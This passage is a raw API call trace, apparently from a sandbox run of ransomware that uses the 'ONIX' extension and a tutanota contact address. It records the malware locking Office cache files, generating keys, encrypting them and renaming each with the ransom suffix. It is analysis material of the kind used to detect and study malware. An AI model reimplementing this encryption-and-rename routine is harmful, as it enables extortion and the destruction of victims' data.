lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.785] GetLastError () returned 0x0 [0104.785] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0104.785] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.785] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.785] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.785] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.785] GetLastError () returned 0x0 [0104.785] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0104.785] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.786] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1e6600, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.786] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.786] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.787] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.787] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.788] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.788] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.788] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0104.788] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0104.788] GetProcessHeap () returned 0x410000 [0104.788] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0104.788] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0104.788] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.788] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1992192) returned 1 [0104.788] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1e6600 [0104.788] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.788] GetProcessHeap () returned 0x410000 [0104.788] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.788] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.788] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.791] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.792] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.793] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3680020 [0104.793] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3870020 [0104.794] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.794] ReadFile (in: hFile=0x490, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1e6600, lpOverlapped=0x0) returned 1 [0104.940] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1e6600, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.940] CloseHandle (hObject=0x490) returned 1 [0104.940] GetProcessHeap () returned 0x410000 [0104.940] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.940] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.943] GetProcessHeap () returned 0x410000 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.943] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.943] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.943] GetLastError () returned 0x0 [0104.944] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0104.944] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.944] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10b2, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.944] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.944] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.946] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.946] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.946] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.946] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.946] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0104.946] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0104.946] GetProcessHeap () returned 0x410000 [0104.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0104.946] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0104.946] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.946] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4274) returned 1 [0104.946] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10b2 [0104.946] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.946] GetProcessHeap () returned 0x410000 [0104.946] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.946] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.947] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.948] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.949] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.950] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d8b68 [0104.950] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d9c28 [0104.950] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.950] ReadFile (in: hFile=0x490, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0104.950] SetFilePointer (in: hFile=0x490, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.950] WriteFile (in: hFile=0x490, lpBuffer=0x4d9c28*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9c28*, lpNumberOfBytesWritten=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0104.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.951] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9c28 | out: hHeap=0x410000) returned 1 [0104.951] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10b2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.951] CloseHandle (hObject=0x490) returned 1 [0104.952] GetProcessHeap () returned 0x410000 [0104.952] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.953] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.954] GetProcessHeap () returned 0x410000 [0104.954] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.954] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.954] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.954] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.954] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0104.955] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.955] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.955] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.955] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.955] GetLastError () returned 0x0 [0104.955] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0104.955] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.956] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2a968, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.956] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.956] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.958] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.958] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.958] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.958] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.958] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0104.958] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0104.958] GetProcessHeap () returned 0x410000 [0104.958] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfe) returned 0x4d6b80 [0104.958] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" [0104.958] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.958] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174440) returned 1 [0104.958] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2a968 [0104.959] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.959] GetProcessHeap () returned 0x410000 [0104.959] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6c88 [0104.959] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.959] WriteFile (in: hFile=0x490, lpBuffer=0x4d6c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.960] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.961] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.962] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf50048 [0104.963] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf7a9b8 [0104.963] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.963] ReadFile (in: hFile=0x490, lpBuffer=0xf50048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x2a968, lpOverlapped=0x0) returned 1 [0104.970] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2a968, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.970] CloseHandle (hObject=0x490) returned 1 [0104.971] GetProcessHeap () returned 0x410000 [0104.971] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6c88 | out: hHeap=0x410000) returned 1 [0104.971] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.975] GetProcessHeap () returned 0x410000 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.975] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.975] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.975] GetLastError () returned 0x0 [0104.975] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0104.976] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.976] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x709768, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.976] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.976] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.978] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.978] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.978] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.978] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.978] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0104.978] lstrlenW 